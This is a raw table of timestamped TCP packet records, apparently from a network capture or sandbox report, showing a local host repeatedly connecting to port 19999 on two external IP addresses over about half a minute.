Jul 25, 2024 12:02:30.394701958 CEST	49746	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:30.401473999 CEST	19999	49746	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:30.401580095 CEST	49746	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:30.401751041 CEST	49746	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:30.408406973 CEST	19999	49746	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:30.409204960 CEST	19999	49746	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:30.660840988 CEST	49746	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:30.714009047 CEST	19999	49746	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:30.878566027 CEST	19999	49746	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:30.878664017 CEST	49746	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:31.175462961 CEST	49747	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:31.180623055 CEST	19999	49747	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:31.180706024 CEST	49747	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:31.180879116 CEST	49747	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:31.185959101 CEST	19999	49747	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:31.186021090 CEST	19999	49747	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:31.660840988 CEST	49747	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:31.671854973 CEST	19999	49747	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:31.671915054 CEST	49747	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:32.262881041 CEST	49748	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:32.268300056 CEST	19999	49748	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:32.268377066 CEST	49748	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:32.268635988 CEST	49748	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:32.273526907 CEST	19999	49748	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:32.274009943 CEST	19999	49748	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:32.661277056 CEST	49748	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:32.713994026 CEST	19999	49748	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:32.724138975 CEST	19999	49748	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:32.728025913 CEST	49748	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:33.380003929 CEST	49749	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:33.384799004 CEST	19999	49749	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:33.384922981 CEST	49749	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:33.385164022 CEST	49749	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:33.390091896 CEST	19999	49749	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:33.390121937 CEST	19999	49749	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:33.879698992 CEST	49749	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:33.887609005 CEST	19999	49749	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:33.887691975 CEST	49749	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:34.395910025 CEST	49750	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:34.400813103 CEST	19999	49750	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:34.400896072 CEST	49750	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:34.401041031 CEST	49750	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:34.405913115 CEST	19999	49750	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:34.406008005 CEST	19999	49750	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:34.879664898 CEST	49750	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:35.085191965 CEST	19999	49750	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:35.085261106 CEST	49750	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:35.463359118 CEST	49751	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:35.468746901 CEST	19999	49751	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:35.468828917 CEST	49751	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:35.469060898 CEST	49751	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:35.477696896 CEST	19999	49751	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:35.477710009 CEST	19999	49751	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:35.879641056 CEST	49751	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:35.926196098 CEST	19999	49751	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:36.177150011 CEST	19999	49751	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:36.177225113 CEST	49751	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:36.178270102 CEST	19999	49751	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:36.178324938 CEST	49751	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:36.185461044 CEST	19999	49751	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:36.411401987 CEST	49752	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:36.421920061 CEST	19999	49752	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:36.422013998 CEST	49752	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:36.422288895 CEST	49752	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:36.430347919 CEST	19999	49752	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:36.431648016 CEST	19999	49752	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:36.879770994 CEST	49752	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:36.893965960 CEST	19999	49752	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:36.894036055 CEST	49752	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:37.628921032 CEST	49753	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:37.636893034 CEST	19999	49753	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:37.636974096 CEST	49753	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:37.637110949 CEST	49753	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:37.643623114 CEST	19999	49753	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:37.644901991 CEST	19999	49753	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:38.129451990 CEST	49753	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:38.134840012 CEST	19999	49753	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:38.134903908 CEST	49753	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:38.658396006 CEST	49754	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:38.663189888 CEST	19999	49754	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:38.663275003 CEST	49754	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:38.663475037 CEST	49754	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:38.668380976 CEST	19999	49754	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:38.668471098 CEST	19999	49754	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:39.145061016 CEST	49754	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:39.150563002 CEST	19999	49754	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:39.151108027 CEST	49754	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:39.664403915 CEST	49755	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:39.669889927 CEST	19999	49755	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:39.669954062 CEST	49755	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:39.670140028 CEST	49755	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:39.675024033 CEST	19999	49755	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:39.675160885 CEST	19999	49755	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:40.145267963 CEST	49755	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:40.156692028 CEST	19999	49755	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:40.156797886 CEST	49755	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:40.760878086 CEST	49756	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:40.778040886 CEST	19999	49756	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:40.778161049 CEST	49756	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:40.778388023 CEST	49756	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:40.785809040 CEST	19999	49756	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:40.785881042 CEST	19999	49756	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:41.254532099 CEST	49756	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:41.341972113 CEST	19999	49756	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:41.433361053 CEST	19999	49756	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:41.433517933 CEST	49756	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:41.994231939 CEST	49757	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:41.999401093 CEST	19999	49757	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:41.999484062 CEST	49757	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:41.999670029 CEST	49757	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:42.010030031 CEST	19999	49757	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:42.013045073 CEST	19999	49757	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:42.489044905 CEST	49757	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:42.497863054 CEST	19999	49757	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:42.497937918 CEST	49757	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:43.000159979 CEST	49758	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:43.005491972 CEST	19999	49758	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:43.005568027 CEST	49758	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:43.005789042 CEST	49758	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:43.010612965 CEST	19999	49758	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:43.010752916 CEST	19999	49758	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:43.489037037 CEST	49758	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:43.494905949 CEST	19999	49758	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:43.495018959 CEST	49758	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:44.003106117 CEST	49759	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:44.008023024 CEST	19999	49759	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:44.008124113 CEST	49759	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:44.008321047 CEST	49759	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:44.013087988 CEST	19999	49759	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:44.013358116 CEST	19999	49759	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:44.489089966 CEST	49759	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:44.494602919 CEST	19999	49759	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:44.494667053 CEST	49759	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:45.000878096 CEST	49760	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:45.006484985 CEST	19999	49760	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:45.006582975 CEST	49760	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:45.006835938 CEST	49760	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:45.011581898 CEST	19999	49760	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:45.011647940 CEST	19999	49760	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:45.489051104 CEST	49760	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:45.806828976 CEST	49760	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:46.410620928 CEST	49760	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:46.439877987 CEST	19999	49760	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:46.439958096 CEST	49760	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:46.440644026 CEST	19999	49760	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:46.440695047 CEST	49760	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:46.441317081 CEST	19999	49760	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:46.441380024 CEST	49760	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:46.445826054 CEST	19999	49760	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:46.445883036 CEST	49760	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:46.447902918 CEST	19999	49760	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:46.447949886 CEST	49760	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:46.449287891 CEST	19999	49760	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:46.449353933 CEST	49760	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:46.455681086 CEST	49761	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:46.462920904 CEST	19999	49761	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:46.463016033 CEST	49761	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:46.463242054 CEST	49761	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:46.468075037 CEST	19999	49761	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:46.470058918 CEST	19999	49761	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:46.957741022 CEST	49761	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:46.969341993 CEST	19999	49761	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:46.969418049 CEST	49761	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:47.726118088 CEST	49762	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:47.732681036 CEST	19999	49762	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:47.732749939 CEST	49762	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:47.742626905 CEST	49762	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:47.749129057 CEST	19999	49762	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:47.749139071 CEST	19999	49762	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:48.235655069 CEST	49762	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:48.254014015 CEST	19999	49762	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:48.254066944 CEST	49762	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:48.903141022 CEST	49763	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:48.910938025 CEST	19999	49763	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:48.911051035 CEST	49763	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:48.911735058 CEST	49763	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:48.917465925 CEST	19999	49763	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:48.917613029 CEST	19999	49763	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:49.238930941 CEST	49763	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:49.292496920 CEST	19999	49763	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:49.407138109 CEST	19999	49763	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:49.407279968 CEST	49763	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:49.753251076 CEST	49764	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:49.758315086 CEST	19999	49764	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:49.758373976 CEST	49764	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:49.758584023 CEST	49764	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:49.764147997 CEST	19999	49764	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:49.764168024 CEST	19999	49764	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:50.241446018 CEST	49764	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:50.551140070 CEST	49764	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:51.160528898 CEST	49764	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:51.232258081 CEST	19999	49764	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:51.232325077 CEST	49764	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:51.234056950 CEST	19999	49764	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:51.234116077 CEST	49764	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:51.235518932 CEST	19999	49764	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:51.235564947 CEST	49764	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:51.244107962 CEST	19999	49764	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:51.244158030 CEST	49764	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:51.244582891 CEST	19999	49764	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:51.244625092 CEST	49764	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:51.245837927 CEST	19999	49764	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:51.245877028 CEST	49764	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:51.251887083 CEST	49765	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:51.256943941 CEST	19999	49765	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:51.257041931 CEST	49765	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:51.257242918 CEST	49765	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:51.262342930 CEST	19999	49765	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:51.262382984 CEST	19999	49765	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:51.754859924 CEST	49765	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:51.777096033 CEST	19999	49765	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:51.777167082 CEST	49765	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:52.267343998 CEST	49766	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:52.273642063 CEST	19999	49766	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:52.273731947 CEST	49766	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:52.273967028 CEST	49766	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:52.281095028 CEST	19999	49766	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:52.282073021 CEST	19999	49766	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:52.770781994 CEST	49766	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:52.781078100 CEST	19999	49766	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:52.781135082 CEST	49766	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:53.365572929 CEST	49767	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:53.371135950 CEST	19999	49767	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:53.371216059 CEST	49767	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:53.371387959 CEST	49767	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:53.376391888 CEST	19999	49767	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:53.376405954 CEST	19999	49767	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:53.770445108 CEST	49767	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:53.818229914 CEST	19999	49767	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:53.843918085 CEST	19999	49767	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:53.844007015 CEST	49767	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:54.281881094 CEST	49768	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:54.286966085 CEST	19999	49768	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:54.287060022 CEST	49768	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:54.287261963 CEST	49768	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:54.292164087 CEST	19999	49768	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:54.292421103 CEST	19999	49768	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:54.770224094 CEST	49768	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:54.779179096 CEST	19999	49768	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:54.779232025 CEST	49768	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:55.299613953 CEST	49769	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:55.311527014 CEST	19999	49769	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:55.311647892 CEST	49769	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:55.311777115 CEST	49769	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:55.317333937 CEST	19999	49769	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:55.317346096 CEST	19999	49769	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:55.785857916 CEST	49769	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:55.794080019 CEST	19999	49769	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:55.794166088 CEST	49769	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:56.295542002 CEST	49770	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:56.301378012 CEST	19999	49770	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:56.301461935 CEST	49770	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:56.301645994 CEST	49770	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:56.306461096 CEST	19999	49770	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:56.307643890 CEST	19999	49770	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:56.803117037 CEST	49770	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:56.809777021 CEST	19999	49770	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:56.809834957 CEST	49770	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:57.404660940 CEST	49771	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:57.414568901 CEST	19999	49771	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:57.414719105 CEST	49771	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:57.415225029 CEST	49771	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:57.423286915 CEST	19999	49771	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:57.423394918 CEST	19999	49771	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:57.801929951 CEST	49771	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:57.849936962 CEST	19999	49771	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:57.874010086 CEST	19999	49771	88.198.117.174	192.168.2.4
Jul 25, 2024 12:02:57.874106884 CEST	49771	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:02:58.313426018 CEST	49772	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:58.318356991 CEST	19999	49772	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:58.318430901 CEST	49772	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:58.318702936 CEST	49772	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:58.326740026 CEST	19999	49772	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:58.326751947 CEST	19999	49772	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:58.835330009 CEST	49772	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:59.045900106 CEST	19999	49772	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:59.048182011 CEST	49772	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:59.360877037 CEST	49773	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:59.366529942 CEST	19999	49773	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:59.370455980 CEST	49773	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:59.370663881 CEST	49773	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:02:59.375689030 CEST	19999	49773	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:59.375869036 CEST	19999	49773	5.75.158.61	192.168.2.4
Jul 25, 2024 12:02:59.848515987 CEST	49773	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:00.003123045 CEST	19999	49773	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:00.003176928 CEST	49773	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:00.368000031 CEST	49774	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:00.372883081 CEST	19999	49774	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:00.372994900 CEST	49774	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:00.373193979 CEST	49774	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:00.384330988 CEST	19999	49774	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:00.384382010 CEST	19999	49774	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:00.848557949 CEST	49774	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:00.912508965 CEST	19999	49774	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:00.916002035 CEST	19999	49774	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:00.916099072 CEST	49774	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:01.513653040 CEST	49775	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:01.520170927 CEST	19999	49775	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:01.520292997 CEST	49775	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:01.520553112 CEST	49775	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:01.526051998 CEST	19999	49775	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:01.526101112 CEST	19999	49775	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:01.863799095 CEST	49775	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:01.918997049 CEST	19999	49775	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:02.040569067 CEST	19999	49775	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:02.040646076 CEST	49775	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:02.374330997 CEST	49776	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:02.379637003 CEST	19999	49776	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:02.379724026 CEST	49776	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:02.379940987 CEST	49776	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:02.384850979 CEST	19999	49776	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:02.386801958 CEST	19999	49776	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:02.865583897 CEST	49776	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:02.924993992 CEST	19999	49776	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:02.925163984 CEST	49776	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:03.377547979 CEST	49777	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:03.383110046 CEST	19999	49777	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:03.383189917 CEST	49777	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:03.383342028 CEST	49777	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:03.388271093 CEST	19999	49777	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:03.388667107 CEST	19999	49777	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:03.864293098 CEST	49777	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:03.875540018 CEST	19999	49777	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:03.875614882 CEST	49777	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:04.392271996 CEST	49778	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:04.399274111 CEST	19999	49778	5.75.158.61	192.168.2.4
